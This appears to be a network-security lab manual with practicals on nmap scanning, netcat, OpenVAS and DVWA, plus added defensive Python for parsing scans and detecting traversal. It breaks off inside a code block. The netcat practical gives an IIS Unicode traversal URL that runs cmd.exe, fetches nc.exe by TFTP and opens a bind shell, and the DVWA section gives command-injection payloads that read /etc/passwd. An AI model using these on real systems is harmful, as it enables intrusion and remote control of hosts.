Nmap done: 1 IP address (1 host up) scanned in 7.91 seconds
That is a lot of information: port number, service name and version/banner details for every open port.
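Reading these reports by eye does not scale beyond a few hosts, and the two header styles shown in this manual differ (Nmap 4.11 prints "Interesting ports on host (ip):" in Practical 1, Nmap 5.21 prints "Nmap scan report for host" here). The following Python script is an added example, not code from this manual or from the Nmap project: it parses nmap's normal text output into host records and then triages them for services that should not normally be reachable (cleartext logins, rpcbind, database engines, remote desktop). The RISKY_PORTS list is an assumption made for this illustration, and the sample report is constructed from fragments of the output shown above. For real work prefer nmap's -oX or -oG output formats, which are designed to be parsed.

```python
import re

# Header line as printed by Nmap 4.x ("Interesting ports on host (ip):") and by
# Nmap 5.x and later ("Nmap scan report for host (ip)" or "... for ip").
_HDR_OLD = re.compile(r"^Interesting ports on (\S+) \((\d+\.\d+\.\d+\.\d+)\)")
_HDR_NEW = re.compile(r"^Nmap scan report for (\S+)(?: \((\d+\.\d+\.\d+\.\d+)\))?")
_PORT = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*\S))?\s*$")
_MAC = re.compile(r"^MAC Address: ([0-9A-Fa-f:]{17})")
_IPV4 = re.compile(r"^\d+\.\d+\.\d+\.\d+$")
_STATES = {"open", "closed", "filtered", "unfiltered",
           "open|filtered", "closed|filtered"}


def parse_nmap_output(text):
    """Parse nmap's normal (human-readable) output into a list of host records:
    {"host", "ip", "mac", "ports": [{"port", "proto", "state", "service", "version"}]}.
    Only the line prefix is matched, so a header that a copy-paste glued to the
    following "Not shown: ..." text still parses."""
    hosts, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        m = _HDR_OLD.match(line) or _HDR_NEW.match(line)
        if m:
            name, ip = m.group(1), m.group(2)
            if ip is None and _IPV4.match(name):
                ip = name
            current = {"host": name, "ip": ip, "mac": None, "ports": []}
            hosts.append(current)
            continue
        if current is None:
            continue
        m = _MAC.match(line)
        if m:
            current["mac"] = m.group(1).upper()
            continue
        m = _PORT.match(line)
        if m and m.group(3) in _STATES:
            current["ports"].append({
                "port": int(m.group(1)), "proto": m.group(2),
                "state": m.group(3), "service": m.group(4),
                "version": m.group(5),
            })
    return hosts


# Services that should rarely be reachable from an arbitrary network position:
# cleartext logins, the RPC portmapper, database engines and remote desktops.
# (An assumed triage list for this example, not something nmap itself defines.)
RISKY_PORTS = {21, 23, 111, 1433, 3306, 3389, 5900}


def triage(hosts):
    """Return (ip, port, service) for every open TCP port in RISKY_PORTS."""
    findings = []
    for h in hosts:
        for p in h["ports"]:
            if p["proto"] == "tcp" and p["state"] == "open" and p["port"] in RISKY_PORTS:
                findings.append((h["ip"] or h["host"], p["port"], p["service"]))
    return findings


# Constructed sample: one Nmap 4.11-style report and one 5.21-style report,
# modelled on the output shown in this manual.
SAMPLE_OUTPUT = """\
Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2013-11-11 15:42 EST
Interesting ports on server2.tecmint.com (192.168.0.101):
Not shown: 1674 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
111/tcp  open  rpcbind
3306/tcp open  mysql
8888/tcp open  sun-answerbook
MAC Address: 08:00:27:D9:8E:D7 (Cadmus Computer Systems)

Nmap scan report for 192.168.1.1
Host is up (0.058s latency).
Not shown: 997 closed ports
PORT    STATE  SERVICE VERSION
23/tcp  open   telnet
80/tcp  open   http    Apache httpd 2.2.22 ((Ubuntu))
443/tcp closed https
"""

if __name__ == "__main__":
    for ip, port, service in triage(parse_nmap_output(SAMPLE_OUTPUT)):
        print("%s exposes %s on %d/tcp" % (ip, service, port))
```

Feed it a saved scan with `parse_nmap_output(open("scan.txt").read())`; the triage step is where a team's own policy (which services may face which networks) replaces the assumed list.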

4) Types of port scan

Nmap does port scanning in a number of ways: TCP connect, SYN scan, FIN scan and more. The most popular are TCP connect and SYN scan. In a TCP connect scan a full TCP connection is established; in a SYN scan only the first half of the handshake is completed. When running as non-root on Linux, nmap does a TCP connect scan by default:

$ nmap 192.168.1.1
Syn scanning requires root privileges on linux systems. On ubuntu you have to do a sudo. To
do a syn scan use the -sS option like this

$ sudo nmap -sS 192.168.1.1


SYN scanning is faster because it never completes the TCP handshake. It is stealthier only to a limited extent: the target application never receives a connection, so application logs stay empty, but any modern firewall or IDS sees the SYN packets themselves and can detect the port scan and block the scanner. Note that when nmap runs as root the default technique is the SYN scan, so the following two commands are equivalent:

sudo nmap host

sudo nmap -sS host


There are other port-scanning techniques that we won't cover here; see the nmap manual at http://nmap.org/book/man.html for more information.

Check out the -sF, -sX , -sA , -sN flags for more information on them
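To make the difference between -sT and -sS concrete, the following Python script is an added example, not code from this manual or from nmap: it implements the unprivileged TCP connect scan that nmap performs with -sT, classifying each port as open, closed or filtered from what the operating system's connect() call returns, and runs it against a throw-away listener on 127.0.0.1 that the script itself creates. A SYN scan cannot be written this way, because it needs raw sockets (root) to send a SYN and then withhold the final ACK; that is exactly why nmap falls back to a connect scan when run without privileges. The listener and the port choice are constructed for the demo; nothing else is assumed.

```python
import socket
from concurrent.futures import ThreadPoolExecutor


def probe_tcp(host, port, timeout=1.0):
    """Classify one TCP port the way `nmap -sT` does, using only an ordinary
    connect(): the kernel completes the three-way handshake, so no raw sockets
    and no root are needed.
      open     - handshake completed (SYN -> SYN/ACK -> ACK)
      closed   - the target answered the SYN with RST (ECONNREFUSED)
      filtered - no answer before the timeout, or an ICMP unreachable error:
                 a packet filter dropped the probe or the reply
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(timeout)
    try:
        sock.connect((host, port))
        return "open"
    except ConnectionRefusedError:
        return "closed"
    except (socket.timeout, TimeoutError):
        return "filtered"
    except OSError:
        # EHOSTUNREACH / ENETUNREACH and friends: nmap reports these as filtered too
        return "filtered"
    finally:
        sock.close()


def connect_scan(host, ports, timeout=1.0, workers=32):
    """Scan several ports in parallel and return {port: state}."""
    with ThreadPoolExecutor(max_workers=max(1, min(workers, len(ports)))) as pool:
        states = pool.map(lambda p: probe_tcp(host, p, timeout), ports)
        return dict(zip(ports, states))


def start_listener():
    """Constructed target for a stand-alone demo: a TCP listener on 127.0.0.1 on
    a kernel-chosen port. Nothing ever accept()s, yet the kernel still completes
    the handshake, which is exactly why a connect or SYN scan reports it open."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)
    return srv, srv.getsockname()[1]


def free_port():
    """Pick a port nothing is listening on (bind, read the number, release it)."""
    tmp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    tmp.bind(("127.0.0.1", 0))
    port = tmp.getsockname()[1]
    tmp.close()
    return port


if __name__ == "__main__":
    srv, open_port = start_listener()
    try:
        for port, state in sorted(connect_scan("127.0.0.1", [open_port, free_port()]).items()):
            print("%d/tcp %s" % (port, state))
    finally:
        srv.close()
```

Run it as an ordinary user and capture the loopback traffic while it runs; the three-way handshake followed by a client FIN is what -sT leaves in the target's connection log, and a capture of `sudo nmap -sS` on the same ports shows the SYN/ACK being answered with RST instead.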

Scanning specific ports only


Nmap can be told to scan specific ports or a range of port numbers with the -p switch:

nmap -p1-1000 192.168.1.1/24

The above command scans ports 1 to 1000 on all 256 addresses from 192.168.1.0 to 192.168.1.255.

More examples :

$ nmap -p22,23,100-150 192.168.10.0/24


The above will scan port numbers 22 , 23 and 100 to 150

$ nmap -sS -sU -p T:21,22,23,U:53,137 192.168.10.0/24

The above scans TCP ports 21, 22 and 23 and UDP ports 53 and 137. Both scan types must be requested: with -sU alone nmap warns that no TCP scan type was given and scans only the UDP ports. The combined scan needs root, because -sS and -sU both send raw packets.

5) Skip the online check

By default nmap first checks whether a host is online by pinging it, and it does not port-scan a host that did not reply. Many hosts now run firewalls that block ping requests. In such cases nmap can be told to skip the check and start the port scan right away with the -PN option (spelled -Pn in current releases):

$ nmap 192.168.1.1 -PN

6) Operating System detection

Nmap can try to identify the operating system of the target by TCP/IP fingerprinting, enabled with the -O switch. It needs root privileges because it uses raw sockets. Note that a host firewall on the scanning machine (for example Firestarter on Linux or ZoneAlarm on Windows) may block raw sockets, in which case nmap will not produce proper results.

$ sudo nmap -O 192.168.1.1

Starting Nmap 5.21 ( http://nmap.org ) at 2012-08-16 12:17 IST


Nmap scan report for 192.168.1.1
Host is up (0.0067s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
23/tcp open telnet
80/tcp open http
5431/tcp open park-agent
MAC Address: 00:21:2C:82:08:87 (SemIndia System Private Limited)
Device type: general purpose
Running: Linux 2.6.X
OS details: Linux 2.6.13 - 2.6.28
Network Distance: 1 hop

OS detection performed. Please report any incorrect results at


http://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 2.29 seconds
So nmap is able to detect that the operating system is Linux. It is important to note that the OS
fingerprint reported by nmap may not be very accurate. It tries to discover the operating system
by using some TCP header fields, but this technique cannot tell the exact Linux distro, for
example. It can however in most cases give a correct indication as to whether the target is a
Linux or Windows system.

Here is the scan result of a Windows machine, for example:

$ sudo nmap -O ############

Starting Nmap 5.21 ( http://nmap.org ) at 2012-08-16 14:20 IST

Nmap scan report for ############ (###.###.###.###)
Host is up (0.39s latency).
Not shown: 987 filtered ports
PORT      STATE SERVICE
21/tcp    open  ftp
25/tcp    open  smtp
53/tcp    open  domain
80/tcp    open  http
110/tcp   open  pop3
143/tcp   open  imap
443/tcp   open  https
1433/tcp  open  ms-sql-s
2006/tcp  open  invokator
3306/tcp  open  mysql
3389/tcp  open  ms-term-serv
8443/tcp  open  https-alt
49158/tcp open  unknown
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Microsoft Windows 2008
OS details: Microsoft Windows Server 2008 Beta 3

OS detection performed. Please report any incorrect results at http://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 60.22 seconds

7) Aggressive scanning

The -A option can be used to perform an aggressive scan, which is equivalent to enabling OS
detection, version detection, script scanning and traceroute together. Here is a quick example:
$ sudo nmap -A -T4 ##########
[sudo] password for enlightened:

Starting Nmap 5.21 ( http://nmap.org ) at 2012-08-16 15:02 IST

Nmap scan report for ########## (###.###.###.###)
Host is up (0.38s latency).

PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           Microsoft ftpd
25/tcp    open  smtp          MailEnable smptd 4.26--
53/tcp    open  domain        ISC BIND hostmaster
80/tcp    open  http          Microsoft IIS webserver 7.0
|_html-title: Welcome to Homepage
110/tcp   open  pop3          MailEnable POP3 Server
|_pop3-capabilities: OK(K Capability list follows) USER TOP UIDL
143/tcp   open  imap          MailEnable imapd
|_imap-capabilities: IMAP4rev1 IMAP4 CHILDREN IDLE AUTH=LOGIN AUTH=CRAM-MD5
2006/tcp  open  http          Microsoft IIS httpd 7.0
| html-title: Document Moved
|_Requested resource was http://##########/ABC
3306/tcp  open  mysql         MySQL (unauthorized)
3389/tcp  open  microsoft-rdp Microsoft Terminal Service
8443/tcp  open  ssl/http      Microsoft IIS webserver 7.0
|_sslv2: server still supports SSLv2
|_html-title: Site doesn't have a title (text/html).
49158/tcp open  msrpc         Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Microsoft Windows 2008
OS details: Microsoft Windows Server 2008 Beta 3
Network Distance: 16 hops
Service Info: Host: CL-T192-200CN.home; OS: Windows

TRACEROUTE (using port 21/tcp)
HOP RTT       ADDRESS
1   8.13 ms   192.168.1.1
2   44.42 ms  117.194.224.1
3   40.74 ms  218.248.162.230
4   70.79 ms  218.248.255.82
5   124.74 ms 115.114.130.33.STATIC-Chennai.vsnl.net.in (115.114.130.33)
6   148.41 ms 172.31.19.146
7   145.28 ms ix-0-100.tcore1.MLV-Mumbai.as6453.net (180.87.38.5)
8   366.30 ms if-2-2.tcore2.MLV-Mumbai.as6453.net (180.87.38.2)
9   375.30 ms if-6-2.tcore1.L78-London.as6453.net (80.231.130.5)
10  372.00 ms if-2-2.tcore2.L78-London.as6453.net (80.231.131.1)
11  428.80 ms if-20-2.tcore2.NYY-NewYork.as6453.net (216.6.99.13)
12  442.52 ms if-1-0-0.mcore3.MTT-Montreal.as6453.net (216.6.99.10)
13  382.34 ms if-0-3-1-0.tcore1.MTT-Montreal.as6453.net (64.86.31.53)
14  364.63 ms 64.86.31.42
15
16  369.24 ms ###.###.###.###

OS and Service detection performed.
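The reports in this section are the same normal-output format an administrator gets when scanning hosts they own, and the useful defensive step is to parse them and compare the open ports with what is supposed to be listening. The code below is an added example, not Nmap code and not part of the original manual: it reads the PORT/STATE/SERVICE/VERSION table, the Running: and OS details: lines and the OSScan reliability warning, then lists every open port that is not on an allowlist. The sample report is constructed for the example, modelled on the reports above with a documentation address.

```python
"""Parse an Nmap normal-output report and diff its open ports against a baseline.

Added example for this manual, not Nmap code.  Only the plain-text report
format shown in this section is handled (the port table, Running:/OS details:
lines and the OSScan warning); NSE script lines starting with "|" are skipped.
"""
import re
from typing import Dict, List, Optional, Set, Tuple

# Constructed report, modelled on the scan output shown in this section.
SAMPLE_REPORT = """\
Nmap scan report for 192.0.2.10
Host is up (0.39s latency).
Not shown: 987 filtered ports
PORT      STATE SERVICE      VERSION
21/tcp    open  ftp          Microsoft ftpd
80/tcp    open  http         Microsoft IIS webserver 7.0
|_html-title: Welcome to Homepage
1433/tcp  open  ms-sql-s
3389/tcp  open  ms-term-serv
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Microsoft Windows 2008
OS details: Microsoft Windows Server 2008 Beta 3
"""

PORT_LINE = re.compile(
    r"^(?P<port>\d{1,5})/(?P<proto>tcp|udp|sctp)\s+"
    r"(?P<state>open|closed|filtered|unfiltered|open\|filtered|closed\|filtered)\s+"
    r"(?P<service>\S+)(?:\s+(?P<version>.+))?$"
)


def parse_nmap_report(text: str) -> dict:
    """Return ports, OS guesses and a reliability flag from one normal-output report."""
    ports: List[Dict[str, object]] = []
    os_running: Optional[str] = None
    os_details: Optional[str] = None
    os_reliable = True
    for line in text.splitlines():
        line = line.rstrip()
        m = PORT_LINE.match(line)
        if m:
            ports.append({
                "port": int(m.group("port")),
                "proto": m.group("proto"),
                "state": m.group("state"),
                "service": m.group("service"),
                "version": (m.group("version") or "").strip(),
            })
        elif line.startswith("Running:"):
            os_running = line[len("Running:"):].strip()
        elif line.startswith("OS details:"):
            os_details = line[len("OS details:"):].strip()
        elif line.startswith("Warning: OSScan results may be unreliable"):
            # Nmap itself says the fingerprint needs one open and one closed port.
            os_reliable = False
    return {"ports": ports, "os_running": os_running,
            "os_details": os_details, "os_reliable": os_reliable}


def unexpected_open_ports(report: dict, allowed: Set[Tuple[int, str]]) -> List[Tuple[int, str]]:
    """Open (port, proto) pairs that are not on the allowlist for this host."""
    return sorted(
        (p["port"], p["proto"]) for p in report["ports"]
        if p["state"] == "open" and (p["port"], p["proto"]) not in allowed
    )


if __name__ == "__main__":
    rep = parse_nmap_report(SAMPLE_REPORT)
    print("OS guess:", rep["os_running"], "(reliable)" if rep["os_reliable"] else "(unreliable)")
    # Suppose only the web server is meant to be reachable on this host.
    print("unexpected open ports:", unexpected_open_ports(rep, {(80, "tcp")}))
```

Feeding the real output of a scan of your own host into parse_nmap_report and keeping the allowlist under version control turns the scan into a repeatable check rather than a one-off look.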

Practical: 3

Aim: TCP / UDP connectivity using Netcat

NetCat – The "Swiss Army Knife"

Description

Netcat is a utility that is able to write and read data across TCP and UDP network
connections. If you are responsible for network or system security it is essential that you
understand the capabilities of Netcat. Netcat can be used as a port scanner, a backdoor, a port
redirector, a port listener and lots of other cool things too. It's not always the best tool for the
job, but if I was stranded on an island, I'd take Netcat with me ☺ During this tutorial I'll
demonstrate a complete hack, using Netcat only, just to point out how versatile it is.

Port scanning with Netcat

A scanning example from Hobbit is "nc -v -w 2 -z target 20-30". Netcat will try connecting
to every port between 20 and 30 [inclusive] at the target, and will likely inform you about an
FTP server, telnet server, and mailer along the way. The -z switch prevents sending any data
to a TCP connection and very limited probe data to a UDP connection, and is thus useful as a
fast scanning mode just to see what ports the target is listening on. To limit scanning speed if
desired, -i will insert a delay between each port probe. Even though Netcat can be used for
port scanning it isn’t its strength. A tool such as Nmap is better suited for port scanning.

We scanned 192.168.1.1, ports 1-200. We can see that among others, ports 80, 21 and 25 are
open.

Banner Grabbing with Netcat

So we're interested in knowing what's running behind port 80 and 21. We can use Netcat to
grab port banners in the following way:

So we know it’s probably a Windows 2000 machine as it's running IIS 5.0 and Microsoft FTP
Service.

Let's try to send a malformed URL which attempts to exploit the File Traversal vulnerability
in unpatched IIS servers (pre SP3). We will be using Netcat to check for the vulnerability,
and if found (and it will!), we will upload Netcat to the IIS server and demonstrate how we
can use Netcat as a backdoor.

If you do not know what the Unicode File traversal exploit is, you can check the "IIS
Unicode File Traversal" tutorial, or read it up on the net.

Basically this exploit allows us to "break out" of C:\inetpub\wwwroot and explore and
execute programs anywhere on the attacked machine.

The point here isn't hacking IIS, but the use of Netcat as a backdoor. Don't get
distracted by the whole "hacking into IIS" thing.

Voila! We've sent the URL:

http://192.168.1.90/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\

to the vulnerable IIS server and what we see is a directory listing of the IIS server's C drive. Great! Now we
want to upload Netcat to the IIS server, so we'll use TFTP and integrate the TFTP
commands into the malformed URL.

Notice that the URL has a plus (+) sign between each command. So the command:

tftp -i 192.168.1.9 GET nc.exe

is transformed to:

http://<Exploit URL>/c+TFTP+-i+192.168.1.9+GET+nc.exe
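The reason the URL above works against a server that already checks for ".." is the double encoding: "%255c" decodes once to "%5c" and only on a second decode to a backslash, so a filter that decodes a single time never sees a traversal. From the defender's side the same property is what to look for in web-server logs. The code below is an added example written for this manual (it is not part of the original tutorial or of IIS): it decodes a request path until the text stops changing, treats backslashes as separators the way IIS does, and flags any path that then contains a ".." segment. The access-log lines are constructed for the example and use documentation addresses.

```python
"""Detect single- and double-URL-encoded traversal in Common Log Format lines.

Added example for this manual, not part of the original tutorial.  The path
/scripts/..%255c../winnt/system32/cmd.exe only reveals its ".." after two
URL-decoding rounds, so fully_decode() decodes to a fixed point first.
"""
import re
from typing import List, Tuple
from urllib.parse import unquote

# Constructed access-log lines: the double-encoded request from this section,
# an ordinary page, a single-encoded traversal, and a harmless double-encoded name.
SAMPLE_LOG = [
    '198.51.100.7 - - [16/Aug/2012:14:20:01 +0530] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\\ HTTP/1.0" 200 1324',
    '198.51.100.8 - - [16/Aug/2012:14:20:05 +0530] "GET /index.html HTTP/1.1" 200 512',
    '198.51.100.9 - - [16/Aug/2012:14:20:09 +0530] "GET /images/..%2f..%2fetc/passwd HTTP/1.1" 404 0',
    '198.51.100.10 - - [16/Aug/2012:14:20:12 +0530] "GET /docs/report%2520final.pdf HTTP/1.1" 200 9000',
]

CLF_REQUEST = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]*\] "(?P<method>\S+) (?P<target>\S+)')


def fully_decode(path: str, max_rounds: int = 5) -> str:
    """URL-decode repeatedly until nothing changes, so nested encodings collapse."""
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def is_traversal_attempt(raw_path: str) -> bool:
    """True if the fully decoded path contains a '..' segment."""
    decoded = fully_decode(raw_path)
    # IIS accepts backslash as a separator, so normalise it before splitting.
    segments = decoded.replace("\\", "/").split("/")
    return ".." in segments


def suspicious_requests(log_lines: List[str]) -> List[Tuple[str, str]]:
    """(client_ip, raw_path) for every log line whose path looks like traversal."""
    hits: List[Tuple[str, str]] = []
    for line in log_lines:
        m = CLF_REQUEST.match(line)
        if not m:
            continue                                   # not a well-formed CLF line
        path = m.group("target").split("?", 1)[0]      # ignore the query string
        if is_traversal_attempt(path):
            hits.append((m.group("ip"), path))
    return hits


if __name__ == "__main__":
    for ip, path in suspicious_requests(SAMPLE_LOG):
        print(f"{ip}: {path} -> {fully_decode(path)}")
```

A single-decode check misses the first log line because "..%5c.." is not a ".." segment; the fixed-point decode is what makes the detection line up with what the file system eventually sees.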


Also take a note of your TFTP server, to see if it has successfully uploaded the nc.exe file:

Netcat as a BackDoor

So now we have Netcat uploaded to the IIS server, we want to use it to create a backdoor, in
order to get a remote command prompt.
In order to act as a backdoor we need Netcat to listen on a chosen port on the IIS server (let's
choose port 10001) and then we can connect to this port from our attacking machine… using
Netcat of course!

The command we want to give on the server looks like this:

nc -L -p 10001 -d -e cmd.exe

Here's what that command does:

nc - tells Windows to run the nc.exe file with the following arguments:
-L Tells Netcat to not close and wait for connections
-p Specifies a port to listen for a connection on
-d Tells Netcat to detach from the process we want it to run.
-e Tells what program to run once the port is connected to (cmd.exe)
If we now want to convert this command for Unicode URL use, it will look like this:

http://<Exploit URL>/c+nc+-L+-p+10001+-d+-e+cmd.exe

Now we will execute Netcat on the remote IIS machine:


This should have started Netcat listening on port 10001 on the IIS machine and should
connect the cmd.exe process to the connection stream. From our machine we will try to
connect to the Netcat on the IIS server.

Tada! We have now "shoveled a shell" using Netcat. We effectively have a remote command
prompt on the IIS server, as can be seen from the ipconfig output.

Transferring files using Netcat

Let's look at other possibilities Netcat can provide. Say we wanted to transfer a file called
hack.txt to the IIS server, and for some reason we don't want to TFTP the file. We can use
Netcat to transfer files from one system to another.

To receive a file named hack.txt on the destination system, start Netcat on the IIS server
with the following command:

nc -l -p 1234 > hack.txt

On our source system (the attacking computer) we send a file named hack.txt to the IIS
machine with the following command:

nc destination 1234 < hack.txt

Issue a ^C on the source system and you're done. Be sure to check the file to be sure it is the
same size as the original.

This is what hack.txt looks like

And…Voila!

We can see that the file hack.txt has been transferred to the target system, via port 1234.

These are just a few of the wonderful options Netcat has to offer. Definitely worth RTFMing.
Imagine all the wonderful possibilities of overcoming firewalls with Netcat…


Practical: 4

Aim: Network vulnerability using OpenVAS

1 Introduction

In this exercise we will show a popular open source vulnerability scanner called OpenVAS
(Open Vulnerability Assessment System). OpenVAS is the evolution of a previous project
called Nessus, which became a proprietary tool. The actual security scanner is accompanied
with a daily updated feed of Network Vulnerability Tests (NVTs), over 20,000 in total (as of
January 2011).

2 Goals

Install OpenVAS server and client packages on Ubuntu

Update OpenVAS vulnerability tests

Create a user for scanning

Learn to run scans in batch mode from the command-line client

3 Notes

Commands preceded with "$" imply that you should execute the command as a
general user - not as root.

Commands preceded with "#" imply that you should be working as root.

Commands with more specific command lines (e.g. "RTR-GW>" or "mysql>")
imply that you are executing commands on remote equipment, or within another
program.

4 Installation

4.1 Install the server, client and plugin packages

$ sudo apt-get install openvas-server openvas-client openvas-plugins-base \
    openvas-plugins-dfsg

4.2 Update the vulnerability database

$ sudo openvas-nvt-sync

4.3 Add a user to run the client

$ sudo openvas-adduser
Login: sysadm
Authentication (pass/cert) [pass]: HIT ENTER
Login password: USE CLASS PASSWD

You will then be asked to add "User rules".

Ideally, you will want to only allow scanning on hosts that are under your control. To
understand the syntax, check the openvas-adduser man page.

Let's allow this user to scan hosts in our lab network. Type:

accept 10.10.0.0/16
default deny

Type ctrl-D to exit, and then accept.
5 Operation

5.1 Starting the server


$ sudo service openvas-server start

The server has to load thousands of vulnerability checks, which takes VERY LONG,
especially on a machine that is not very powerful. Most likely, you will not be able to run
this on the virtual NSRC lab.
On a production setup, you will need a machine with multiple processors/cores and quite
a bit of RAM, especially if you will be scanning many hosts.

5.2 Running a scan

Create a text file with a list of hosts/networks to scan.

$ cd /home/sysadm
$ vi scanme.txt

Add one host or network per line, like this:

10.10.0.250
10.10.2.5
... etc.

Check the manual for the client to understand its parameters:

$ man openvas-client

Then, run the client like this:

$ sudo openvas-client -q 127.0.0.1 9390 sysadm nsrc+ws scanme.txt \
    openvas-output.txt -T txt -V -x

Alternatively, you can export into prettier HTML format with:

$ sudo openvas-client -q 127.0.0.1 9390 sysadm nsrc+ws scanme.txt \
    openvas-output.html -T html -V -x

You might have to transfer that file to your laptop so that you can open it with a
browser.


Practical: 5
Aim: Web application testing using DVWA

1) Background Information

 What is Damn Vulnerable Web App (DVWA)?

o Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application
that is damn vulnerable.
o Its main goals are to be an aid for security professionals to test their skills and
tools in a legal environment, help web developers better understand the
processes of securing web applications and aid teachers/students to
teach/learn web application security in a class room environment.

 What is Command Execution?

o Command Execution is where a website application provides the
ability to execute system commands.

 What is a Command Injection Attack?

o The purpose of the command injection attack is to inject and execute
commands specified by the attacker in the vulnerable application.
o In situations like this, the application, which executes unwanted system
commands, is like a pseudo system shell, and the attacker may
use it as an authorized system user.
o Note, the commands are executed with the same privileges as the application
and/or web server.
o Command injection attacks are possible in most cases because of lack of
correct input data validation, which can be manipulated by the attacker
(forms, cookies, HTTP headers etc.).

 What is Command Injection Harvesting?

o Command Injection Harvesting is where a malicious user manipulates a
website command execution application to render sensitive data (e.g.,
usernames, config files, directory and file listings, etc.).
 Unix/Linux Example: 9.9.9.9; cat /etc/passwd
 Windows Example: 9.9.9.9 && dir
 Pre-Requisite Lab

 Lab Notes

o In this lab we will do the following:
1. We will test Command Execution where Security is set to low
2. We will demonstrate how other Linux/Unix commands can be
appended to an IP Address for execution.
3. We will explore the code that allows for malicious use.

Section 1: Configure Fedora14 Virtual Machine Settings

1. Open Your VMware Player
o Instructions:
1. On Your Host Computer, Go To
2. Start --> All Program --> VMWare --> VMWare Player

2. Edit Fedora 14 Virtual Machine Settings
o Instructions:
1. Highlight fedora14
2. Click Edit virtual machine settings

3. Edit Network Adapter
o Instructions:
1. Highlight Network Adapter
2. Select Bridged
3. Click on the OK Button.


Section 2: Login to Fedora14

1. Start Fedora14 VM Instance
o Instructions:
1. Start Up VMWare Player
2. Select Fedora14
3. Play virtual machine

2. Login to Fedora14
o Instructions:
1. Login: student
2. Password: <whatever you set it to>.

Section 3: Open Console Terminal and Retrieve IP Address

1. Start a Terminal Console
o Instructions:
1. Applications --> Terminal

2. Switch user to root

o Instructions:
1. su - root
2. <Whatever you set the root password to>

3. Get IP Address
o Instructions:
1. ifconfig -a
o Notes:
As indicated below, my IP address is
192.168.1.106. Please record your IP address.

Section 4: Start Up Damn Vulnerable Web App (DVWA)

1. Start up a Web Browser
o Instructions:
1. Applications --> Internet --> Firefox
o Notes:
You can open up a Web browser on any Operating System on
your network.
Working with DVWA does not have to be done on your Fedora
machine; the only requirements to play with DVWA are as follows:
1. The Fedora Server is on the Network.
2. httpd is running
3. mysqld is running

DVWA Database setup

Instructions:
0. http://192.168.1.106/dvwa/login.php
 Replace 192.168.1.106 with the IP Address obtained from
Section 3, Step 3.
1. Username: admin
2. Password: password
 "password" is the default password for user admin.

Set Website Security Level (Part 1)

Instructions:
0. Click on DVWA Security

Set Website Security Level (Part 2)

Instructions:
0. Select Low
1. Click Submit

Section 5: Command Execution

1. Command Execution
o Instructions:
1. Click on Command Execution

2. Execute Ping
o Notes:
 Below we are going to do a simple ping test using the web interface.
 As an example, ping something on your network.
 Use the IP Address obtained in Section 3, Step 3 if you have nothing
else to ping.
Instructions:
0. 192.168.1.106
1. Click Submit

cat /etc/passwd (Attempt 1)

Instructions:
0. cat /etc/passwd
1. Click Submit
Notes:
 Notice that either a message saying illegal IP address was
displayed or nothing was returned.

cat /etc/passwd (Attempt 2)

Instructions:
0. 192.168.1.106; cat /etc/passwd
1. Click Submit
Notes:
 Notice that we are now able to see the contents of the /etc/passwd file.

Looking at the weakness

Instructions:
0. Bring up a terminal window (See Section 3, Step 1, if you don't
know how)
1. cat /var/www/html/dvwa/vulnerabilities/exec/source/low.php
Notes:
0. Notice the two shell_exec lines.
1. These are the lines that execute ping depending on which
Operating System is being used.
2. In a Unix/Linux shell, you can run multiple commands separated
by a ";".
3. Notice the code does not check whether $target matches an IP Address
pattern such as
 \d+.\d+.\d+.\d+, where "\d+" represents a number with
the possibility of multiple digits, like 192.168.1.106.
4. The code therefore allows an attacker to append commands behind
the IP Address:
1. 192.168.1.106; cat /etc/passwd
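The notes above identify the defect (the target goes into shell_exec with no check) and sketch a regex fix. The example below, added for this manual and not DVWA's own PHP, models both sides in Python: vulnerable_command_string() shows the exact string the shell receives, LOOSE_IP_RE reproduces the \d+.\d+.\d+.\d+ pattern from the notes to show why an unanchored regex with unescaped dots still accepts the injected input, and build_ping_argv() is the proper fix: parse the input as an IP address with the standard ipaddress module and hand ping an argument list without a shell, so ";" has no meaning. The "ping -c 3" form is assumed from the Linux branch described on the page.

```python
r"""DVWA's low-security ping page modelled in Python, beside a hardened version.

Added example for this manual, not DVWA code.  The low.php source passes
$target straight into shell_exec('ping -c 3 ' . $target); the fix validates
the target as an IP address and runs ping with an argv list and no shell.
"""
import ipaddress
import re
import subprocess
from typing import List

# The pattern suggested in the lab notes.  Used with search() it is no defence:
# "." matches any character and nothing anchors the match to the whole string.
LOOSE_IP_RE = re.compile(r"\d+.\d+.\d+.\d+")


def vulnerable_command_string(target: str) -> str:
    """The string shell_exec('ping -c 3 ' . $target) hands to /bin/sh, unexecuted."""
    return "ping -c 3 " + target


def is_valid_ip(target: str) -> bool:
    """Strict check: the whole string must parse as one IPv4 or IPv6 address."""
    try:
        ipaddress.ip_address(target.strip())
    except ValueError:
        return False
    return True


def build_ping_argv(target: str) -> List[str]:
    """Validated argument vector for ping; raises ValueError on anything else."""
    if not is_valid_ip(target):
        raise ValueError(f"refusing to ping non-IP target: {target!r}")
    addr = ipaddress.ip_address(target.strip())
    # Pass the canonical text form of the parsed address, never the raw user string.
    return ["ping", "-c", "3", str(addr)]


def run_ping(target: str) -> str:
    """Run ping without a shell; only reachable with a validated address."""
    argv = build_ping_argv(target)
    completed = subprocess.run(argv, capture_output=True, text=True,
                               timeout=15, check=False)
    return completed.stdout


if __name__ == "__main__":
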